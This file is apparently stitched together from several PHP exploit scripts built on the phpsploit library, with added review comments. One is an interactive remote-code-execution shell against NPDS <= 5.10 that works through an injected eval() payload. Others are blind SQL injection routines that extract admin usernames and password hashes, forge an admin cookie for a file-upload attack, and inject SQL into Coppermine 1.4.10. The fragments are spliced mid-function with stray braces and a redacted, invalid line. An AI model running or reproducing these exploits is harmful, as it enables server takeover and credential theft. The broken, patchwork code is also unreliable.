/**
 * Interactive command loop for the phpsploit-driven injection.
 *
 * Reads the target URL and optional proxy settings through get_p(), builds
 * the injected PHP payload once, then for every prompted command ships the
 * command base64-encoded in a custom request header (the injected eval()
 * reads it back from $_SERVER[HTTP_MYPCODE]) and prints whatever the
 * response carries between two per-run separator markers.
 *
 * @return void
 */
function main()
{
    // HTTP client used for every request
    $client = new phpsploit();
    $client->agent('Mozilla Firefox');
    head();

    // Target base URL (required). NOTE(review): it is concatenated with
    // 'index.php?...' below, so it is assumed to end in '/' — confirm that
    // get_p() or the caller enforces this.
    $target = get_p('url', true);

    // Optional proxy (host:port) and basic proxy credentials
    $proxyHost = get_p('proxhost');
    $proxyAuth = get_p('proxauth');
    if ($proxyHost) {
        $client->proxy($proxyHost);
        if ($proxyAuth) {
            $client->proxyauth($proxyAuth);
        }
    }

    // Injected PHP: break out of the single-quoted context, echo a marker,
    // eval the header-supplied code, echo the marker again, then stop so the
    // rest of the page never renders.
    $openQuoteBypass = "1');";
    $markerStr = md5(rand(0, 1000000000) . 'HEY_YA'); // per-run output delimiter
    $markerStmt = "print('{$markerStr}');";
    $evalStmt = 'eval(base64_decode($_SERVER[HTTP_MYPCODE]));';
    $payload = $openQuoteBypass . $markerStmt . $evalStmt . $markerStmt . 'exit();//';

    for (;;) {
        $command = cmd_prompt();
        if ($command === false) {
            break;
        }
        // The command travels in a request header so magic_quotes_gpc never
        // sees it; add_slashes() escapes it for the system("...") wrapper.
        $shellCode = 'system("' . add_slashes($command) . '");';
        $client->addheader('MypCode', base64_encode($shellCode));
        $client->get($target . 'index.php?fields=' . to_char($payload) . ',1');

        // Whatever sits between the two markers is the command output
        $parts = explode($markerStr, $client->getcontent());
        if (!isset($parts[1])) {
            // No marker in the response: the injection did not execute
            print "\nFailed";
            exit(1);
        }
        if (empty($parts[1])) {
            print "\nNo output: system() disabled OR cmd failed OR cmd without output";
            continue;
        }
        print "\n" . $parts[1];
    }
    return;
}
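error_reporting(E_ALL ^ E_NOTICE);
# Advisory soon
# Usage banner. $argc counts the script name, so "-url <url>" alone gives 3.
if ($argc < 3) {
    print "\n  TITLE | Net Portal Dynamic System (NPDS) <= 5.10 Remote Code Execution 0day\n AUTHOR | DarkFig \\/ http://www.acid-root.new.fr \\/ gmdarkfig@gmail.com\n   NOTE | Works regardless of php settings\n  USAGE | {$argv['0']} -url <url> [Options]\nOPTIONS | -proxy     If you wanna use a proxy <proxyhost:proxyport> \n        | -proxyauth Basic authentification <proxyuser:proxypwd>\n";
    exit(1);
}
# Command-line options. The second argument to getparam() presumably marks the
# option as required (it is only ever passed for -url) — confirm in getparam().
$url = getparam('url', 1);
$pro = getparam('proxy');
# FIX: the usage text advertises -proxyauth, but the option was read as
# 'proyauth', so proxy credentials were silently ignored.
$pra = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
if ($pro) {
    $xpl->proxy($pro);
}
if ($pra) {
    $xpl->proxyauth($pra);
}
# Author's excerpt of the vulnerable print.php. Note that the integer cast on
# line 125 is applied to $lid, while the query on line 31 interpolates $sid —
# presumably the injection point.
# +print.php (SQL INJECTION)
# |
# 124. } elseif (!empty($lid)) {
# 125.  settype ($lid, "integer");
# 126.  PrintPage("links",$DB, $lid);
#
# 30.  if ($oper=="links") {
# 31.  $result=mysql_query("select url, title, description, date from ".$DB."links_links where lid='$sid'");
# 32.  list($url, $title, $description, $time)=mysql_fetch_row($result);
# 40.  if ($DB) {
# 41.  $remp=meta_lang(aff_code(aff_langue(ob_get_contents())));
#
# Injected sub-selects. The CHAR() sequences decode to the markers
# BEGINUSR/ENDUSR and BEGINPWD/ENDPWD, which bracket the super-admin's aid and
# pwd in the response so they can be cut out reliably. %20 stands in for
# spaces because these fragments are placed in a query string.
$aid = 'CONCAT(CHAR(66,69,71,73,78,85,83,82),(SELECT%20aid%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,85,83,82))';
$pwd = 'CONCAT(CHAR(66,69,71,73,78,80,87,68),(SELECT%20pwd%20FROM%20authors%20WHERE%20radminsuper=1),CHAR(69,78,68,80,87,68))';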
}
# Target base URL (required) and the table prefix; defaults to 'nuke' when
# -prefix is absent or empty.
$url = getparam("url", 1);
$tblprfix = getparam("prefix") != "" ? getparam("prefix") : 'nuke';
# Any non-empty -debug value enables debug output (debug(1) below).
$debug = getparam("debug") != "" ? 1 : 0;
# Iteration count handed to bruteforce() (kept as a string, default 1e8);
# presumably the argument of a MySQL BENCHMARK() timing oracle — confirm in
# bruteforce().
$benchmark = getparam("benchmark") != "" ? getparam("benchmark") : '100000000';
# Optional proxy (host:port) and basic proxy credentials.
$proxy = getparam("proxy");
$proxyauth = getparam("proxyauth");
$xpl = new phpsploit();
$xpl->agent('Mozilla Firefox');
# By method name: do not follow redirects, do not keep cookies — confirm in phpsploit.
$xpl->allowredirection(0);
$xpl->cookiejar(0);
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($proxyauth) {
    $xpl->proxyauth($proxyauth);
}
if ($debug) {
    debug(1);
}
# NOTE(review): the next line is not valid PHP as archived — "******" looks
# like a redaction of the statement that originally sat between the two
# prints (by symmetry with the bruteforce('pwd') call below, presumably
# bruteforce('aid')). Restore it from the original 3450.php before running.
print "\nUsername: "******"\nPassword: ";
bruteforce('pwd');
exit(0);
function bruteforce($field)
{
    global $url, $xpl, $tblprfix, $truetime, $debug, $benchmark, $sql, $bef, $aft, $fak, $b, $c, $f, $dfield, $a, $result;
    $a = 0;
    $v = '';
    $dfield = $field;
    exit(1);
}
# Required options: target base URL and the local file to upload.
$url = getparam('url', 1);
$file = getparam('file', 1);

# Optional overrides, each falling back to a default when the option is
# absent or empty. getparam() is deliberately called twice per option, as
# the original did.
$prfix = 'webs';
if (getparam('prefix') != '') {
    $prfix = getparam('prefix');
}
$match_upload = '\\;URL\\=index\\.php\\?site\\=files\\&file\\=';
if (getparam('upmatch') != '') {
    $match_upload = getparam('upmatch');
}
$match_blindsql = 'site\\=profile\\&id\\=';
if (getparam('sqlmatch') != '') {
    $match_blindsql = getparam('sqlmatch');
}

# Optional proxy (host:port) and basic proxy credentials.
$proxy = getparam('proxy');
$authp = getparam('proxyauth');

$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if ($proxy) {
    $xpl->proxy($proxy);
}
if ($authp) {
    $xpl->proxyauth($authp);
}

# Recover the admin id and password hash through blind() (presumably the
# blind-SQL oracle — confirm), then present them as the ws_auth cookie:
# "<id>%3A<hash>", %3A being a URL-encoded ':'.
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth={$userid}%3A{$passwd})";
$xpl->addcookie("ws_auth", $userid . "%3A" . $passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
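# Optional proxy (host:port) and basic proxy credentials, taken from argv.
# Both are optional (see the !empty() checks below), so guard the reads with
# isset(): indexing a missing $argv offset would otherwise raise an
# "Undefined offset" notice on every run without a proxy.
$pxs = isset($argv[4]) ? $argv[4] : null;
$pxa = isset($argv[5]) ? $argv[5] : null;

$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);

print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if (!empty($pxs)) {
    print "\nstatus> Using a proxy {$pxs}";
    $xpl->proxy($pxs);
}
if (!empty($pxa)) {
    print "\nstatus> Basic proxy authentification {$pxa}";
    $xpl->proxyauth($pxa);
}

# Table prefix: the users table name is derived from the installed version
# (1.4.10 -> cpg1410_users), so fetch include/index.html, which advertises
# it. $url is expected to have been set earlier in the script (not shown
# here) and to end with '/'.
print "\nstatus> Searching the version";
$xpl->get($url . 'include/index.html');
if (preg_match("#Coppermine version: ([0-9]*\\.[0-9]*\\.[0-9]*)#", $xpl->getcontent(), $matches)) {
    print "\nsploit> Coppermine version " . $matches[1];
} else {
    print "\nsploit> Not found";
}
# Fall back to the 1.4.10 table name when the version could not be read.
$table = !empty($matches[1]) ? 'cpg' . str_replace('.', '', $matches[1]) . '_users' : 'cpg1410_users';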
/*/
 If you have the admin cookie (but not the password),
 replace lines 73=>76 by $xpl->addcookie('yourcookie');